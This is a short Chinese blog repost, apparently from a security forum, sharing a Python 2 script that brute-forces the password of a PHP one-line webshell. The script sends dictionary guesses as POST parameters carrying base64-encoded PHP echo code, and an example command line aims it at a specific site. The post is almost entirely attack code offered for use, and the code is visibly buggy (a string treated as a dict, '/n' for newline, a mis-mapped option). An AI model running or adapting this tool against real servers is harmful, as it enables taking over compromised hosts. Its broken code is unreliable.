今天测试用了一下Tools 的 这个python 脚本的,感觉也不错。收藏一下!
exploit: python one.py -f /home/passwword.txt -u http://www.code521.com/ccode.php -i 1000
#!/usr/bin/python #-*- coding: GB2312 -*- #author:loversorry import urllib2 import urllib import os import sys import getopt import base64 def usage(): print sys.argv[0]+" -u -t php -f ./password.txt -i 1000" def readFile(): posts = {} posts_arr = [] f = open(file_name,'r') i = 0 for line in f.readlines(): line = line.replace('/n','') temp = base64.b64encode(line+'**==**1a1a1a').replace('=',''); posts='$a=%s;$b=base64_decode($a);echo($b);' % temp i = i+1 if i>int(num)-1: posts_arr.append(str(posts)) posts.clear() i = 0 if len(posts): posts_arr.append(str(posts)) f.close() return posts_arr def intruder(postDatas): headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0' } ok = False for item in range(len(postDatas)): postData = postDatas[item] postData = urllib.urlencode(eval(postData)) request = urllib2.Request(url,postData,headers) response = urllib2.urlopen(request) text = response.read() if text.find('1a1a1a') <> -1: print '/n破解成功,密码为:'+text.split('**==**')[0] ok = True break else: sys.stdout.write(".") return ok if __name__ == '__main__': opts,args = getopt.getopt(sys.argv[1:],'hu:t:f:i:') url = '' server_type = '' file_name = '' num = '' for opt,value in opts: if opt == '-u': url = value elif opt == '-t': file_name = value elif opt == '-f': file_name = value elif opt == '-i': num = value elif opt == '-h': usage() sys.exit() if file_name == '' or num == '' or url == '': usage() sys.exit() sys.stdout.write("开始破解:") if intruder(readFile()) == False: print '/n破解失败,换字典试试!'
原文地址:https://www.t00ls.net/thread-37383-1-1.html
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论